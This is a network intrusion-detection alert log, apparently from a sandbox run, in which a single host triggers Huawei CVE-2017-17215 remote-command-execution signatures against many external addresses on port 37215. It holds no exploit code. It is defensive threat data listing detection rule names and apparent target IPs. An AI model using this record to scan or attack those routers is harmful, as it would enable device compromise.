                                            06/14/24-10:44:08.505222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913037215192.168.2.1441.65.184.242
                                            06/14/24-10:44:33.152028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188037215192.168.2.14156.105.162.43
                                            06/14/24-10:44:18.763700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374837215192.168.2.1441.74.33.63
                                            06/14/24-10:43:43.941229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484437215192.168.2.14156.31.108.208
                                            06/14/24-10:43:58.274062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4424837215192.168.2.14197.125.188.143
                                            06/14/24-10:43:41.848784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5799637215192.168.2.14156.76.123.118
                                            06/14/24-10:43:37.772265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127237215192.168.2.14197.177.30.122
                                            06/14/24-10:44:16.717484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922837215192.168.2.14197.176.166.81
                                            06/14/24-10:43:56.224955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4326637215192.168.2.14197.25.147.55
                                            06/14/24-10:44:24.942517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028437215192.168.2.14197.53.75.96
                                            06/14/24-10:43:54.185234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293437215192.168.2.14197.176.211.233
                                            06/14/24-10:44:20.805185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5111637215192.168.2.1441.0.101.44
                                            06/14/24-10:43:58.295667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459237215192.168.2.1441.49.255.136
                                            06/14/24-10:44:04.409526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810437215192.168.2.14156.171.153.113
                                            06/14/24-10:43:34.662326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764837215192.168.2.1441.31.120.95
                                            06/14/24-10:44:22.862379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909837215192.168.2.14197.161.88.230
                                            06/14/24-10:44:04.410734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407037215192.168.2.14156.213.190.236
                                            06/14/24-10:44:10.580872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639837215192.168.2.14197.97.245.102
                                            06/14/24-10:44:10.545782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440237215192.168.2.14156.51.217.226
                                            06/14/24-10:44:04.410567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4672037215192.168.2.14197.125.50.147
                                            06/14/24-10:44:00.338143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434437215192.168.2.14156.185.244.202
                                            06/14/24-10:44:18.776498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100237215192.168.2.14156.195.50.9
                                            06/14/24-10:44:22.878204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378037215192.168.2.1441.36.26.139
                                            06/14/24-10:44:00.340505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788637215192.168.2.14197.105.58.120
                                            06/14/24-10:44:08.502851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669637215192.168.2.1441.93.214.222
                                            06/14/24-10:43:58.275662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365037215192.168.2.14156.128.115.220
                                            06/14/24-10:44:33.133860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566237215192.168.2.14156.158.185.220
                                            06/14/24-10:43:52.161572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567437215192.168.2.1441.93.177.177
                                            06/14/24-10:43:45.990388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595637215192.168.2.14156.6.124.50
                                            06/14/24-10:43:58.290546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912437215192.168.2.1441.229.168.45
                                            06/14/24-10:43:45.966326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444037215192.168.2.14156.251.77.78
                                            06/14/24-10:43:52.148861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612037215192.168.2.14156.183.113.170
                                            06/14/24-10:43:54.184566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997637215192.168.2.1441.229.171.191
                                            06/14/24-10:44:26.979206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375837215192.168.2.14197.188.249.94
                                            06/14/24-10:44:06.452919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491437215192.168.2.1441.153.122.1
                                            06/14/24-10:43:58.289053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605837215192.168.2.14197.243.255.132
                                            06/14/24-10:44:00.337203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843237215192.168.2.1441.196.75.2
                                            06/14/24-10:43:39.790121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4584637215192.168.2.14197.178.23.194
                                            06/14/24-10:44:08.521739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536637215192.168.2.1441.136.89.196
                                            06/14/24-10:44:22.862029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841637215192.168.2.1441.118.233.74
                                            06/14/24-10:43:43.967797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300437215192.168.2.14156.209.38.133
                                            06/14/24-10:43:56.242608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690037215192.168.2.14156.151.77.232
                                            06/14/24-10:44:16.716242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042237215192.168.2.14197.207.223.90
                                            06/14/24-10:43:56.230804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639437215192.168.2.1441.42.166.253
                                            06/14/24-10:44:04.422844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4182237215192.168.2.14197.63.83.29
                                            06/14/24-10:44:06.452610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614437215192.168.2.14156.10.221.124
                                            06/14/24-10:44:16.716998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155237215192.168.2.1441.94.249.43
                                            06/14/24-10:44:08.519744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540037215192.168.2.1441.114.133.135
                                            06/14/24-10:43:34.662561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895037215192.168.2.1441.73.147.202
                                            06/14/24-10:44:12.615208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662637215192.168.2.14156.44.169.184
                                            06/14/24-10:43:34.660337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176637215192.168.2.1441.60.152.249
                                            06/14/24-10:43:54.184859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302437215192.168.2.14197.45.36.99
                                            06/14/24-10:44:14.681352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755837215192.168.2.14156.202.109.29
                                            06/14/24-10:43:54.183539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815237215192.168.2.14197.57.241.193
                                            06/14/24-10:43:36.700678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654037215192.168.2.1441.122.52.32
                                            06/14/24-10:44:22.861620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349837215192.168.2.1441.225.130.114
                                            06/14/24-10:43:36.703408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300237215192.168.2.14197.19.81.151
                                            06/14/24-10:43:36.704378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278237215192.168.2.1441.153.60.230
                                            06/14/24-10:43:52.146437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687037215192.168.2.1441.38.30.70
                                            06/14/24-10:44:14.669949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170037215192.168.2.14197.198.90.99
                                            06/14/24-10:43:54.198483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433637215192.168.2.1441.117.6.125
                                            06/14/24-10:44:00.337163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3447837215192.168.2.14197.164.50.69
                                            06/14/24-10:44:10.543630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5458237215192.168.2.14197.42.107.47
                                            06/14/24-10:44:08.519886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015037215192.168.2.14156.87.187.206
                                            06/14/24-10:43:39.791847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5506437215192.168.2.14197.53.126.156
                                            06/14/24-10:44:04.422951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879437215192.168.2.14156.247.2.59
                                            06/14/24-10:44:04.409303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165437215192.168.2.14197.75.83.128
                                            06/14/24-10:44:14.684321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244637215192.168.2.14197.95.202.245
                                            06/14/24-10:44:33.152837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986637215192.168.2.14197.235.174.63
                                            06/14/24-10:44:29.010099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883237215192.168.2.1441.190.81.236
                                            06/14/24-10:43:39.808955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497237215192.168.2.14156.78.100.216
                                            06/14/24-10:43:45.985429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471037215192.168.2.14197.122.9.210
                                            06/14/24-10:44:02.366374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056437215192.168.2.1441.207.32.54
                                            06/14/24-10:44:22.881708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141837215192.168.2.1441.78.193.11
                                            06/14/24-10:43:41.848887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904837215192.168.2.1441.154.231.20
                                            06/14/24-10:43:34.675803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545037215192.168.2.14197.136.147.208
                                            06/14/24-10:43:56.228927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797637215192.168.2.14197.21.156.233
                                            06/14/24-10:43:50.071429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863637215192.168.2.14197.1.99.204
                                            06/14/24-10:44:26.976929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695837215192.168.2.14197.121.16.78
                                            06/14/24-10:44:29.027195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515437215192.168.2.14156.241.249.63
                                            06/14/24-10:44:02.383172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873837215192.168.2.14156.66.98.99
                                            06/14/24-10:44:33.152305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3488237215192.168.2.1441.207.140.196
                                            06/14/24-10:44:22.859053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170037215192.168.2.14156.142.226.38
                                            06/14/24-10:43:58.275927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5293637215192.168.2.14156.252.93.202
                                            06/14/24-10:44:35.179619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036637215192.168.2.14197.102.250.22
                                            06/14/24-10:44:10.546860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450037215192.168.2.14197.46.102.79
                                            06/14/24-10:44:04.407445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458637215192.168.2.14197.44.86.205
                                            06/14/24-10:44:00.326155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638637215192.168.2.1441.40.18.111
                                            06/14/24-10:43:36.704390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838837215192.168.2.14197.63.45.83
                                            06/14/24-10:44:14.670346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658437215192.168.2.14197.123.242.46
                                            06/14/24-10:43:56.224581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265237215192.168.2.14156.26.59.244
                                            06/14/24-10:44:10.545832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812837215192.168.2.14197.50.147.188
                                            06/14/24-10:44:16.732683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242837215192.168.2.14156.68.61.30
                                            06/14/24-10:43:54.185132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811437215192.168.2.1441.194.250.204
                                            06/14/24-10:44:31.090969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955037215192.168.2.1441.86.106.77
                                            06/14/24-10:43:48.029991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3305837215192.168.2.14156.70.159.85
                                            06/14/24-10:43:48.031459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858637215192.168.2.14197.133.198.241
                                            06/14/24-10:44:02.367606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498837215192.168.2.1441.43.184.219
                                            06/14/24-10:43:58.274686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277037215192.168.2.14156.17.154.122
                                            06/14/24-10:44:29.014591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6063237215192.168.2.1441.197.213.179
                                            06/14/24-10:44:12.616498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044437215192.168.2.1441.138.165.111
                                            06/14/24-10:43:34.676617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057037215192.168.2.14197.171.154.221
                                            06/14/24-10:44:08.501763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451637215192.168.2.14156.185.105.116
                                            06/14/24-10:43:52.164430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677637215192.168.2.1441.9.223.119
                                            06/14/24-10:44:22.861871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394837215192.168.2.14197.160.154.221
                                            06/14/24-10:43:50.111666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948837215192.168.2.14156.28.137.12
                                            06/14/24-10:44:29.022788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766437215192.168.2.1441.32.51.143
                                            06/14/24-10:44:24.917062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984437215192.168.2.14197.67.235.19
                                            06/14/24-10:43:50.113773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5823637215192.168.2.14197.150.11.155
                                            06/14/24-10:43:52.163825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937237215192.168.2.1441.178.210.251
                                            06/14/24-10:44:26.997975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370437215192.168.2.14156.121.26.112
                                            06/14/24-10:43:37.763137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610637215192.168.2.1441.179.105.36
                                            06/14/24-10:43:48.017387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121237215192.168.2.1441.252.118.77
                                            06/14/24-10:43:58.292491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600037215192.168.2.14197.190.42.222
                                            06/14/24-10:43:43.944441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259437215192.168.2.1441.248.141.248
                                            06/14/24-10:43:36.718352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050637215192.168.2.14156.109.253.210
                                            06/14/24-10:44:22.882895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871837215192.168.2.14197.77.32.68
                                            06/14/24-10:44:31.056548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252637215192.168.2.14156.12.137.16
                                            06/14/24-10:43:37.762246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4301037215192.168.2.14197.64.3.231
                                            06/14/24-10:43:45.965465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958037215192.168.2.14197.138.56.222
                                            06/14/24-10:44:18.776694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862637215192.168.2.1441.74.249.53
                                            06/14/24-10:44:33.134193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764437215192.168.2.1441.111.38.15
                                            06/14/24-10:44:18.766607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036037215192.168.2.14156.234.223.3
                                            06/14/24-10:44:04.421287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860437215192.168.2.14197.27.106.170
                                            06/14/24-10:44:02.381474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732437215192.168.2.14156.223.115.29
                                            06/14/24-10:44:20.829980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550637215192.168.2.14156.99.139.110
                                            06/14/24-10:43:45.967457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507837215192.168.2.1441.144.233.24
                                            06/14/24-10:43:54.183893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369437215192.168.2.14156.149.243.124
                                            06/14/24-10:43:54.202028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855637215192.168.2.1441.70.80.34
                                            06/14/24-10:44:12.616309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032637215192.168.2.14197.130.54.137
                                            06/14/24-10:44:29.011618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408637215192.168.2.14197.101.195.37
                                            06/14/24-10:44:04.411640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397037215192.168.2.14197.101.187.95
                                            06/14/24-10:44:24.917209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5325037215192.168.2.1441.198.226.91
                                            06/14/24-10:44:33.132953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5484237215192.168.2.14197.133.241.146
                                            06/14/24-10:44:20.805063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855637215192.168.2.1441.15.157.185
                                            06/14/24-10:44:33.152579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146637215192.168.2.14156.216.253.197
                                            06/14/24-10:44:04.410428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912037215192.168.2.1441.232.224.12
                                            06/14/24-10:44:33.134998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704037215192.168.2.14197.52.123.16
                                            06/14/24-10:43:41.849282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5466637215192.168.2.14156.130.112.214
                                            06/14/24-10:43:56.229586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5176837215192.168.2.14156.132.222.45
                                            06/14/24-10:44:04.422072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932837215192.168.2.14156.152.138.230
                                            06/14/24-10:44:08.517283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521437215192.168.2.14197.199.158.222
                                            06/14/24-10:44:10.546053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761237215192.168.2.14197.123.219.26
                                            06/14/24-10:44:06.451113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986437215192.168.2.1441.0.179.232
                                            06/14/24-10:44:10.567133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705437215192.168.2.14156.136.112.159
                                            06/14/24-10:43:34.676891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501637215192.168.2.1441.123.150.169
                                            06/14/24-10:44:22.859945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960237215192.168.2.1441.129.236.30
                                            06/14/24-10:44:06.472522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402037215192.168.2.14197.22.248.168
                                            06/14/24-10:43:41.897178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843437215192.168.2.14197.15.50.175
                                            06/14/24-10:44:24.915559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566837215192.168.2.14156.129.99.137
                                            06/14/24-10:44:27.001134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852437215192.168.2.14197.41.39.177
                                            06/14/24-10:43:34.679704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904437215192.168.2.14156.86.255.150
                                            06/14/24-10:43:50.074230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450837215192.168.2.14197.54.140.226
                                            06/14/24-10:44:20.806271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515237215192.168.2.14156.225.132.132
                                            06/14/24-10:43:52.143443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739237215192.168.2.14197.181.74.132
                                            06/14/24-10:44:22.883085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285237215192.168.2.14197.45.179.90
                                            06/14/24-10:44:27.000494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133037215192.168.2.14156.157.23.63
                                            06/14/24-10:44:00.344263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928837215192.168.2.14197.131.168.222
                                            06/14/24-10:43:39.807758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5510837215192.168.2.14197.54.143.119
                                            06/14/24-10:44:31.088990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373237215192.168.2.14197.58.152.245
                                            06/14/24-10:44:26.997403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5447837215192.168.2.14156.163.182.246
                                            06/14/24-10:43:58.273706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748437215192.168.2.1441.77.131.47
                                            06/14/24-10:43:56.226473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767837215192.168.2.14156.246.152.201
                                            06/14/24-10:44:18.777754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000637215192.168.2.14197.129.207.119
                                            06/14/24-10:44:31.089916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797837215192.168.2.14197.217.139.217
                                            06/14/24-10:44:33.148758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935837215192.168.2.1441.71.149.1
                                            06/14/24-10:44:24.913217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656437215192.168.2.1441.18.33.153
                                            06/14/24-10:44:24.914143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193037215192.168.2.14156.22.51.22
                                            06/14/24-10:43:50.111996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926037215192.168.2.14156.246.192.109
                                            06/14/24-10:43:50.112251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813437215192.168.2.14156.246.211.240
                                            06/14/24-10:44:08.518363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603637215192.168.2.14156.83.183.214
                                            06/14/24-10:44:24.917125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681637215192.168.2.14197.1.78.2
                                            06/14/24-10:43:37.762865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429237215192.168.2.14156.64.225.131
                                            06/14/24-10:43:54.199734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891837215192.168.2.14197.244.104.174
                                            06/14/24-10:43:41.849764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296437215192.168.2.14156.162.167.145
                                            06/14/24-10:44:20.827476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677237215192.168.2.14197.231.236.45
                                            06/14/24-10:44:12.615991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382837215192.168.2.14156.49.37.166
                                            06/14/24-10:44:24.934481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810037215192.168.2.1441.137.77.38
                                            06/14/24-10:43:48.030179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4551437215192.168.2.14197.24.125.130
                                            06/14/24-10:44:33.132992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223037215192.168.2.14156.225.66.159
                                            06/14/24-10:43:45.966675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541437215192.168.2.14197.62.200.138
                                            06/14/24-10:44:12.613964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918637215192.168.2.14197.224.204.212
                                            06/14/24-10:44:02.387264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020637215192.168.2.14156.253.151.71
                                            06/14/24-10:44:16.737826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291237215192.168.2.1441.82.130.16
                                            06/14/24-10:44:08.504537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799837215192.168.2.14197.170.50.224
                                            06/14/24-10:44:06.472779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375837215192.168.2.14156.46.102.55
                                            06/14/24-10:44:14.672917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202237215192.168.2.1441.31.151.169
                                            06/14/24-10:43:52.146685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074237215192.168.2.14156.105.85.250
                                            06/14/24-10:43:48.028320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960237215192.168.2.14197.1.129.45
